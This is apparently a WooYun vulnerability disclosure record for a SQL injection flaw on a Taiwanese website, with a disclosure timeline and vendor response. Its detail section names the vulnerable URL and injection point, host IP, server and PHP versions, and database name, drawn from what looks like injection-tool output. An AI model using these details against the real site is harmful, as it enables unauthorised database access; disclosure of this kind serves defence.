Vulnerability Summary

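Bug ID: wooyun-2015-0125266

Title: SQL injection vulnerability on the main site of Taiwan's 连客网

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 蝶.!

Submitted: 2015-07-13 07:37

Fixed: 2015-08-27 09:44

Published: 2015-08-27 09:44

Vulnerability Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]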


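Vulnerability Details

Disclosure Status:

2015-07-13: Details reported to the vendor; awaiting vendor handling
2015-07-13: Vendor confirmed; details disclosed only to the vendor
2015-07-23: Details disclosed to core white hats and experts in related fields
2015-08-02: Details disclosed to regular white hats
2015-08-12: Details disclosed to intern white hats
2015-08-27: Details disclosed to the public

Brief Description:

SQL injection vulnerability in Taiwan's 连客网, involving a large number of databases

Detailed Description: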

Analyzing http://linker.tw/url.php?uct=0-0-12-5-0*31
Host IP: 59.120.218.253
Web Server: Apache/2.2.6 (Fedora)
Powered-by: PHP/5.2.4
Selected Column Count is 4
Injection type is String (')
Finding string column: 1
Valid String Column is 1
DB Server: MySQL
Finding current data base
Current DB: vLi_nker

Proof of Vulnerability:


Remediation:

Copyright notice: please credit the source 蝶.!@乌云 when reposting


Vulnerability Response

Vendor Response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-07-13 09:42

Vendor Reply:

Thank you for the report!!

Latest Status:

None